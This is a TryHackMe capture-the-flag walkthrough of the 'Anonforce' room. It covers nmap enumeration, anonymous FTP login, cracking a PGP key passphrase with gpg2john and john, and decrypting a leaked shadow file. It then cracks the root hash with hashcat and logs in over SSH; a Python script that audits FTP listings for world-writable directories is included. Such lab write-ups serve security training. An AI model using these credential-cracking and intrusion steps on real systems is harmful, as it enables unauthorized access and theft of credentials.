TryHackMe Walkthrough - Anonforce
PGP? GPG? PGGPPGG?
12/01/2021
Now that I have some time off of university, I thought I’d try and get some old TryHackMe rooms done. I decided to start off easy and work my way up, so let’s give “Anonforce” a go!
Enumeration
I started off with a nice and easy nmap scan. I scanned all the ports (just in case) and threw the “-sV” flag on there for good measure. The scan didn’t take too long, but it wasn’t incredibly exciting.
PORT STATE SERVICE VERSION 
21/tcp open ftp vsftpd 3.0.3 
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
User Flag
Let’s give the FTP server a shot. I tried connecting to it using user anonymous and password anonymous, and it worked a treat!
ftp 10.10.42.70 
Connected to 10.10.42.70. 
220 (vsFTPd 3.0.3) 
Name (10.10.42.70:chris): anonymous 
331 Please specify the password. 
Password: 
230 Login successful. 
Remote system type is UNIX. 
Using binary mode to transfer files. 
ftp>
From here, I moved into the home directory and found the home folder of the user “melodias”. Moving into that directory, I found the user flag! I used the “get” command to download it and opened it up on my local machine! Easy peasy! One flag down, one to go!
Root Flag
Now for the root flag. After snooping around for a bit I noticed a folder in the root directory called “notread”.
ftp> ls 
200 PORT command successful. Consider using PASV. 
150 Here comes the directory listing. 
drwxr-xr-x 2 0 0 4096 Aug 11 2019 bin 
drwxr-xr-x 3 0 0 4096 Aug 11 2019 boot 
drwxr-xr-x 17 0 0 3700 Jan 12 03:41 dev 
drwxr-xr-x 85 0 0 4096 Aug 13 2019 etc 
drwxr-xr-x 3 0 0 4096 Aug 11 2019 home 
lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img -> boot/initrd.img-4.4.0-157-generic 
lrwxrwxrwx 1 0 0 33 Aug 11 2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic 
drwxr-xr-x 19 0 0 4096 Aug 11 2019 lib 
drwxr-xr-x 2 0 0 4096 Aug 11 2019 lib64 
drwx------ 2 0 0 16384 Aug 11 2019 lost+found 
drwxr-xr-x 4 0 0 4096 Aug 11 2019 media 
drwxr-xr-x 2 0 0 4096 Feb 26 2019 mnt 
drwxrwxrwx 2 1000 1000 4096 Aug 11 2019 notread 
drwxr-xr-x 2 0 0 4096 Aug 11 2019 opt 
dr-xr-xr-x 95 0 0 0 Jan 12 03:41 proc 
drwx------ 4 0 0 4096 Jan 12 04:05 root 
drwxr-xr-x 18 0 0 560 Jan 12 04:05 run 
drwxr-xr-x 2 0 0 12288 Aug 11 2019 sbin 
drwxr-xr-x 3 0 0 4096 Aug 11 2019 srv 
dr-xr-xr-x 13 0 0 0 Jan 12 03:41 sys 
drwxrwxrwt 9 0 0 4096 Jan 12 03:41 tmp 
drwxr-xr-x 10 0 0 4096 Aug 11 2019 usr 
drwxr-xr-x 11 0 0 4096 Aug 11 2019 var 
lrwxrwxrwx 1 0 0 30 Aug 11 2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic 
lrwxrwxrwx 1 0 0 30 Aug 11 2019 vmlinuz.old -> boot/vmlinuz-4.4.0-142-generic 
226 Directory send OK.
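Seen from the defending side, what stands out in that listing is a world-writable, non-root-owned directory sitting at the root of a share that anonymous FTP users can browse. As an added example (my own, not from the room), here is a small Python audit that re-parses an “ls -l” listing of that shape and flags exactly those entries; the listing it embeds is a trimmed, constructed copy of the one above.

```python
"""Audit an FTP 'ls -l' listing for directories that are risky to expose.

Flags directories that are world-writable without the sticky bit, or that
are owned by a non-root account, on a share rooted at the filesystem root.
"""
import re

# Constructed sample: a trimmed copy of the listing in the post. vsftpd
# prints numeric uid/gid for anonymous sessions, so owners appear as numbers.
SAMPLE_LISTING = """\
drwxr-xr-x 2 0 0 4096 Aug 11 2019 bin
drwxr-xr-x 3 0 0 4096 Aug 11 2019 home
drwxrwxrwx 2 1000 1000 4096 Aug 11 2019 notread
drwx------ 4 0 0 4096 Jan 12 04:05 root
drwxrwxrwt 9 0 0 4096 Jan 12 03:41 tmp
lrwxrwxrwx 1 0 0 30 Aug 11 2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic
"""

# perms links uid gid size month day year-or-time name [-> target]
LINE_RE = re.compile(
    r"^(?P<perms>[dl-][rwxsStT-]{9})\s+\d+\s+(?P<uid>\d+)\s+(?P<gid>\d+)"
    r"\s+\d+\s+\S+\s+\d+\s+[\d:]+\s+(?P<name>.+?)(?: -> .*)?$"
)


def audit_listing(listing: str) -> dict:
    """Return {directory name: [issue, ...]} for every directory with a problem."""
    findings = {}
    for line in listing.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or m["perms"][0] != "d":   # only directories; skip links, files, noise
            continue
        perms, name = m["perms"], m["name"]
        issues = []
        other_write, other_exec = perms[8] == "w", perms[9]
        # World-writable without the sticky bit: any account, including the
        # anonymous FTP user, can drop, replace or remove files here.
        if other_write and other_exec not in ("t", "T"):
            issues.append("world-writable (no sticky bit)")
        # A share rooted at / should only expose root-owned top-level trees.
        if m["uid"] != "0":
            issues.append(f"owned by uid {m['uid']}, not root")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit_listing(SAMPLE_LISTING).items():
        print(f"{name}: {'; '.join(issues)}")
```

Running it against the sample reports only “notread”; “tmp” is world-writable too but carries the sticky bit, so it is left alone.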
Out of respect, I didn’t look into the folder any further. 
Just kidding! 
Moving into it I found two files – “backup.pgp” and “private.asc”. I won’t lie, I didn't know the first thing about PGP or GPG so I had to do some research here. It turns out we should be able to decrypt “backup.pgp” using “private.asc” as the key! Good stuff! I downloaded both files onto my machine. I started by trying to add “private.asc” to my keyring using the command:
gpg --import private.asc
I was then prompted for a passphrase. I didn’t know it, so let’s crack it! Using “gpg2john”, a tool that comes with John the Ripper, I was able to turn "private.asc" into a hash file that john could crack!
gpg2john private.asc > key
Then I ran john against my new "key" file. What would you know, it cracked it almost instantly! I used the "--show" flag to view the password.
john key
john key --show
I could then run the import command again and use the newfound passphrase to import the key! Awesome! Now we use GPG to decrypt our other file!
gpg --decrypt backup.pgp
This output what appeared to be a copy of the “shadow” file from the server, containing a hash of the root password! This should be simple enough to crack! I moved the hash into a file called "root.hash" and, using hashcat in mode 1800 (sha512crypt, the “$6$” hash format) with the rockyou.txt wordlist, made quick work of it!
hashcat -a 0 -m 1800 root.hash /usr/share/wordlists/rockyou.txt
After a few moments I had the root password! I could use this password to SSH as root onto the server and grab the flag!
ssh root@IP cat root.txt
Conclusion
Overall this room was quite straightforward! The only challenge I had was with the PGP/GPG keys as I’ve never used them before! If you’re familiar with them I think you’d breeze through this room no problem!